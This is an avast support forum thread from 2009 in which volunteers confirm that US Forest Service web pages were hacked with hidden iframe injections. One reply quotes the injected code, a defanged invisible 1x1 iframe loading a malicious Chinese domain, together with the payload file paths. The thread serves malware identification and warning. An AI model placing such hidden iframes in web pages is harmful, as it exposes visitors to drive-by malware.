avast!WEBforum
November 22, 2009, 01:30:00 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: User Map added recently - see where we all live!
 
   Home   Help Search Calendar Login Register  
Pages: [1]   Go Down
  Print  
Author Topic: Iframe-inf infects the United States Forest Service???  (Read 689 times)
cowboythecat
Newbie
*
Offline Offline

United States United States

Posts: 4


Personal Message (Offline)
« on: April 14, 2009, 03:31:34 PM »

Hi, I have been getting a warning that the USFS websites (all of them) are infected with Iframe-inf.

A few have gone down and now have the "experiencing technical difficulties" generic message, which leads me to believe that it may be a real threat.

But linkscanner says they are safe.

Help???

Thanks.
Logged
Tech
avast! translator
avast! Technical
******
Offline Offline

Gender: Male
Spain Spain

Posts: 47062



Personal Message (Offline)
« Reply #1 on: April 14, 2009, 03:48:09 PM »

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
Logged

avast Settings - FAQ - Links
Help me helping you! Sign up & use Mozy to get 2,200 Mb for free remote backup. Enjoy its safety!
cowboythecat
Newbie
*
Offline Offline

United States United States

Posts: 4


Personal Message (Offline)
« Reply #2 on: April 14, 2009, 03:52:52 PM »

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

I'm sorry, but I don't understand what you mean...  Please use "internet for dummies" terminology when asking me stuff... Embarrassed Tongue

I am not aware of a known hack of the USFS.
Logged
DavidR
avast! Überevangelist
******
Offline Offline

Gender: Male
United Kingdom United Kingdom

Posts: 37819



Personal Message (Offline)
« Reply #3 on: April 14, 2009, 03:59:10 PM »

Got a link ?
Change the http to hXXP in the URL to ensure it isn't active avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack iframe injection is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.
Logged

Core2Duo E8300/ 2GB Ram/ WinXP ProSP3/ Avast 4.8.1356 Home/ Outpost Firewall Pro 2009/ Firefox 3.5.5 NoScript/ MailWasher Pro 6.5.4/ SuperAntiSpyware Pro/ MalwareBytes AntiMalware/ WinPatrol/ HiJackThis /Drive Image 7.1 /OE6 /SnagIt 9.1 Image Capture
cowboythecat
Newbie
*
Offline Offline

United States United States

Posts: 4


Personal Message (Offline)
« Reply #4 on: April 14, 2009, 04:05:08 PM »

Got a link ?
Change the http to hXXP in the URL to ensure it isn't active avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack iframe injection is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.

I think the link you searched is as good as any...

I have checked multiple FS sites now and gotten the "website currently unavailable" page without a warning from avast... Does this mean I should be concerned that my computer is infected?

Running the most current version of the free program, and using the most current firefox browser.

Thanks for your replies.  Better let my coworkers who run other less-thorough antivirus programs I suppose. Cool
Logged
cowboythecat
Newbie
*
Offline Offline

United States United States

Posts: 4


Personal Message (Offline)
« Reply #5 on: April 14, 2009, 04:09:35 PM »

Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.
Logged
DavidR
avast! Überevangelist
******
Offline Offline

Gender: Male
United Kingdom United Kingdom

Posts: 37819



Personal Message (Offline)
« Reply #6 on: April 14, 2009, 05:18:24 PM »

Those page that you are getting the message without an avast alert, I can only assume have been cleaned but the site I guess won't be available until they resolve not only the removal of the injected iframes but how they got there and to close that vulnerability.

So without URLs for those you can view without alert there is no way to confirm that they have in fact been cleaned. Though there is more than enough evidence that they have been hacked. If as you say this spreads over multiple sites, though I only see links for the one fs.fed.us domain it could be an orchestrated attack.

Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

Your viewing of the source is different to mine as this too has most certainly been hacked (see image), with the same injection of a hidden iframe pointing to a Chinese domain...

So I don't see how you are able to see the page with the unavailable message, though that would also depend on your browser (?)
Logged

Core2Duo E8300/ 2GB Ram/ WinXP ProSP3/ Avast 4.8.1356 Home/ Outpost Firewall Pro 2009/ Firefox 3.5.5 NoScript/ MailWasher Pro 6.5.4/ SuperAntiSpyware Pro/ MalwareBytes AntiMalware/ WinPatrol/ HiJackThis /Drive Image 7.1 /OE6 /SnagIt 9.1 Image Capture
polonus
avast! Evangelist
*****
Offline Offline

Gender: Male
Netherlands Netherlands

Posts: 8274


malware fighter


WWW Personal Message (Offline)
« Reply #7 on: April 14, 2009, 05:37:19 PM »

Hi DavidR:

Here the results of the Bad Stuff Detektor:
Total zeroiframes found: 1

Check took 6.95 seconds

(Level: 0) Url checked:
hxxp://www.fs.fed.us/
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/in.cgi?income56
Zeroiframes detected on this site: 0
No ad codes identified
Code:
<iframe src="hxxp://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>


(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/readme.pdf
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/flash.swf
Blank page / could not connect
No ad codes identified


polonus
Logged

Cybersecurity is more of an attitude than anything else. Avast Evangelists.
scythe944
avast! Evangelist
*****
Offline Offline

Gender: Male
United States United States

Posts: 1230



WWW Personal Message (Offline)
« Reply #8 on: April 15, 2009, 02:13:52 AM »

Quote
I am not aware of a known hack of the USFS.

We found one on the US International Trade Commission site...
http://forum.avast.com/index.php?topic=43712

I think they were down for a little over a week after I notified them.

US government sites seem to be getting hit hard these days.
Logged

-Have I helped you? Sign up for Mozy (free pc backup) and help me!
-For generic computer (not avast) problems, you can also visit my forum for help: http://www.jacobytech.net/forum
CharleyO
avast! Evangelist
*****
Offline Offline

Gender: Male
United States United States

Posts: 4998


avast!4 just keeps getting better all the time!


WWW Personal Message (Offline)
« Reply #9 on: April 15, 2009, 07:36:47 AM »

***

The website at ... www.fs.fed.us/r9/shawnee/ ... is currently down apparently to repair the infection.

See the image below. Click to enlarge.


***
Logged

Thanks to SASHA For My Nice Avatar!
~ It is not important what other people think about you.
    It is important what you truly know about yourself. ~
AMD 64 3200+
Gigabyte GA-K8NS Ultra-939
1 gb RAM
GeForce FX 5800 w/256 ram
XP/SP3 Home
Avast Pro 4.8, Spybot-S&D, SpywareTerminator, ZA Free
Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.10 | SMF © 2006-2009, Simple Machines LLC Valid XHTML 1.0! Valid CSS!
Page created in 0.082 seconds with 15 queries.